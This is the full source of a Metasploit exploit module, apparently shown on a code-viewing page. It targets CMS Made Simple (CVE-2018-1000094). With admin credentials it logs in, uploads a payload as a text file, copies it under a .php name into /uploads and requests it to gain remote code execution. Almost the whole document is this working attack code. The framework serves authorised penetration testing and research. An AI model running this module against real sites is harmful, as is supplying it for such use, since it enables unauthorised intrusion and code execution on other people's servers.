Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::FileDropper
11
  prepend Msf::Exploit::Remote::AutoCheck
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'            => 'CMS Made Simple Authenticated RCE via File Upload/Copy',
16
      'Description'     => %q{
17
        CMS Made Simple allows an authenticated administrator to upload a file
18
        and rename it to have a .php extension. The file can then be executed
19
        by opening the URL of the file in the /uploads/ directory.
20

21
        This module has been successfully tested on CMS Made Simple versions
22
        2.2.5 and 2.2.7.
23
      },
24
      'Author' =>
25
        [
26
          'Mustafa Hasen',  # Vulnerability discovery and EDB PoC
27
          'Jacob Robles'    # Metasploit Module
28
        ],
29
      'License'         => MSF_LICENSE,
30
      'References'      =>
31
        [
32
          [ 'CVE', '2018-1000094' ],
33
          [ 'CWE', '434' ],
34
          [ 'EDB', '44976' ],
35
          [ 'URL', 'http://dev.cmsmadesimple.org/bug/view/11741' ]
36
        ],
37
      'Privileged'  => false,
38
      'Platform'  => [ 'php' ],
39
      'Arch'  => ARCH_PHP,
40
      'Targets' =>
41
        [
42
          [ 'Universal', {} ],
43
        ],
44
      'DefaultTarget'  => 0,
45
      'DisclosureDate' => '2018-07-03'))
46

47
    register_options(
48
      [
49
        OptString.new('TARGETURI', [ true, "Base cmsms directory path", '/cmsms/']),
50
        OptString.new('USERNAME', [ true, "Username to authenticate with", '']),
51
        OptString.new('PASSWORD', [ true, "Password to authenticate with", ''])
52
      ])
53
  end
54

55
  def check
56
    res = send_request_cgi({
57
      'uri' => normalize_uri(target_uri.path),
58
      'method' => 'GET'
59
    })
60

61
    unless res
62
      vprint_error 'Connection failed'
63
      return CheckCode::Unknown
64
    end
65

66
    unless res.body =~ /CMS Made Simple/i
67
      return CheckCode::Safe
68
    end
69

70
    if res.body =~ %r{CMS Made Simple</a> version (\d+\.\d+\.\d+)}i
71
      version = Rex::Version.new($1)
72
      vprint_status("#{peer} - CMS Made Simple Version: #{version}")
73

74
      if version == Rex::Version.new('2.2.5')
75
        return CheckCode::Appears
76
      end
77
    end
78

79
    CheckCode::Detected
80
  end
81

82
  def exploit
83
    res = send_request_cgi({
84
      'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
85
      'method' => 'POST',
86
      'vars_post' => {
87
        'username' => datastore['USERNAME'],
88
        'password' => datastore['PASSWORD'],
89
        'loginsubmit' => 'Submit'
90
      }
91
    })
92
    unless res
93
      fail_with(Failure::NotFound, 'A response was not received from the remote host')
94
    end
95

96
    unless res.code == 302 && res.get_cookies && res.headers['Location'] =~ /\/admin\?(.*)?=(.*)/
97
      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
98
    end
99

100
    vprint_good("#{peer} - Authentication successful")
101
    csrf_name = $1
102
    csrf_val = $2
103

104
    csrf = {csrf_name => csrf_val}
105
    cookies = res.get_cookies
106
    filename = rand_text_alpha(8..12)
107

108
    # Generate form data
109
    message = Rex::MIME::Message.new
110
    message.add_part(csrf[csrf_name], nil, nil, "form-data; name=\"#{csrf_name}\"")
111
    message.add_part('FileManager,m1_,upload,0', nil, nil, 'form-data; name="mact"')
112
    message.add_part('1', nil, nil, 'form-data; name="disable_buffer"')
113
    message.add_part(payload.encoded, nil, nil, "form-data; name=\"m1_files[]\"; filename=\"#{filename}.txt\"")
114
    data = message.to_s
115

116
    res = send_request_cgi({
117
      'uri' => normalize_uri(target_uri.path, 'admin', 'moduleinterface.php'),
118
      'method' => 'POST',
119
      'data' => data,
120
      'ctype' => "multipart/form-data; boundary=#{message.bound}",
121
      'cookie' => cookies
122
    })
123

124
    unless res && res.code == 200
125
      fail_with(Failure::UnexpectedReply, 'Failed to upload the text file')
126
    end
127
    vprint_good("#{peer} - File uploaded #{filename}.txt")
128

129
    fileb64 = Rex::Text.encode_base64("#{filename}.txt")
130
    data = {
131
      'mact' => 'FileManager,m1_,fileaction,0',
132
      "m1_fileactioncopy" => "",
133
      'm1_selall' => "a:1:{i:0;s:#{fileb64.length}:\"#{fileb64}\";}",
134
      'm1_destdir' => '/',
135
      'm1_destname' => "#{filename}.php",
136
      'm1_path' => '/uploads',
137
      'm1_submit' => 'Copy',
138
      csrf_name => csrf_val
139
    }
140

141
    res = send_request_cgi({
142
      'uri' => normalize_uri(target_uri.path, 'admin', 'moduleinterface.php'),
143
      'method' => 'POST',
144
      'cookie' => cookies,
145
      'vars_post' => data
146
    })
147

148
    unless res
149
      fail_with(Failure::NotFound, 'A response was not received from the remote host')
150
    end
151

152
    unless res.code == 302 && res.headers['Location'].to_s.include?('copysuccess')
153
      fail_with(Failure::UnexpectedReply, 'Failed to rename the file')
154
    end
155
    vprint_good("#{peer} - File renamed #{filename}.php")
156

157
    register_files_for_cleanup("#{filename}.txt", "#{filename}.php")
158

159
    res = send_request_cgi({
160
      'uri' => normalize_uri(target_uri.path, 'uploads', "#{filename}.php"),
161
      'method' => 'GET',
162
      'cookie' => cookies
163
    })
164
  end
165
end
166

167